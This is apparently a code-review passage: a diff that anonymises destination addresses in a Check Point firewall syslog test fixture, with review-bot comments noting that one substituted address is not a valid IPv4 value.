 <134>1 2020-03-29T18:44:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec94,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50775"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T18:44:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec94,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50776"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T18:44:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ec95,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
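Review bot: The first added line of this hunk substitutes `dst:"2267.43.156.12"`, which is not a valid IPv4 address (the first octet exceeds 255), so a pipeline that maps `dst` into an `ip`-typed field would presumably reject this fixture event rather than index it. Every other substitution in this hunk and in the hunks at -3969 and -3982 uses the well-formed `175.16.199.1`, so this looks like a typo rather than an intended negative-test case. The removed value was the IGMP all-hosts multicast address, which is not a routable public address; either keep `dst:"224.0.0.1"` or use a well-formed test address consistent with the rest of the change. The expected-output file for this fixture is not in the hunk, so I cannot tell whether it was regenerated against the invalid value.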
@@ -4059,7 +4059,7 @@ <134>1 2020-03-29T18:48:37Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ed85,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T18:49:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80edb5,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39916"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] <134>1 2020-03-29T18:49:27Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80edb7,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T18:49:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80edba,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56281"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"] +<134>1 2020-03-29T18:49:30Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80edba,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56281"; service:"53"; service_id:"domain-udp"; 
src:"192.168.1.100"] <134>1 2020-03-29T18:50:19Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80edeb,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"50593"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] <134>1 2020-03-29T18:50:21Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80eded,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T18:50:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80edf9,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"162.159.200.123"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35409"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"] 
@@ -4068,8 +4068,8 @@ <134>1 2020-03-29T18:50:36Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80edfc,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"50788"; service:"443"; service_id:"https"; src:"192.168.1.117"] <134>1 2020-03-29T18:51:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee21,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"255.255.255.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"9999"; service:"9999"; src:"192.168.1.1"] <134>1 2020-03-29T18:51:14Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee22,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; 
dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] -<134>1 2020-03-29T18:51:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee2c,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"] -<134>1 2020-03-29T18:51:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee2c,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"224.0.0.1"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"] +<134>1 2020-03-29T18:51:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee2c,0x0,0x353707c7,0xee78a1dc}"; 
origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5351"; src:"192.168.1.1"] +<134>1 2020-03-29T18:51:24Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee2c,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"2267.43.156.12"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"5351"; service:"5350"; src:"192.168.1.1"] <134>1 2020-03-29T18:51:25Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee2d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; 
s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.94"] <134>1 2020-03-29T18:51:39Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee3b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"] <134>1 2020-03-29T18:51:41Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80ee3d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] 
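Review bot: Both added lines in this hunk (sequencenum 1 and 2 of the 18:51:24Z records) now carry `dst:"2267.43.156.12"`, which is not a valid IPv4 address because its first octet exceeds 255, so the anonymised fixture contains a destination that no IP parser will accept. If this sample is run through the module's pipeline and the destination field is mapped as an IP type, the event would presumably fail or the expected-output file would end up recording an error, which makes this look like a typo rather than an intended edge case. The other hunks in this file replace the public resolver address with `175.16.199.1`; using the same value here, `dst:"175.16.199.1"`, keeps the fixture consistent, or the original `dst:"224.0.0.1"` could simply be kept, since a multicast group address is already non-routable and needed no masking.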
@@ -4361,10 +4361,10 @@ <134>1 2020-03-29T19:32:38Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f7d6,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"] <134>1 2020-03-29T19:32:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f7da,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"137"; service:"137"; service_id:"nbname"; src:"192.168.1.94"] <134>1 2020-03-29T19:32:42Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e80f7da,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.1"] -<134>1 2020-03-29T19:32:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7e2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35959"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T19:32:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7e2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510370"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"47363"; service:"53"; 
service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7ec,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510380"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"39863"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] -<134>1 2020-03-29T19:33:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7ec,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585510380"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"52754"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T19:32:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7e2,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & 
FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35959"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"] +<134>1 2020-03-29T19:32:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e80f7e2,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585510370"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; 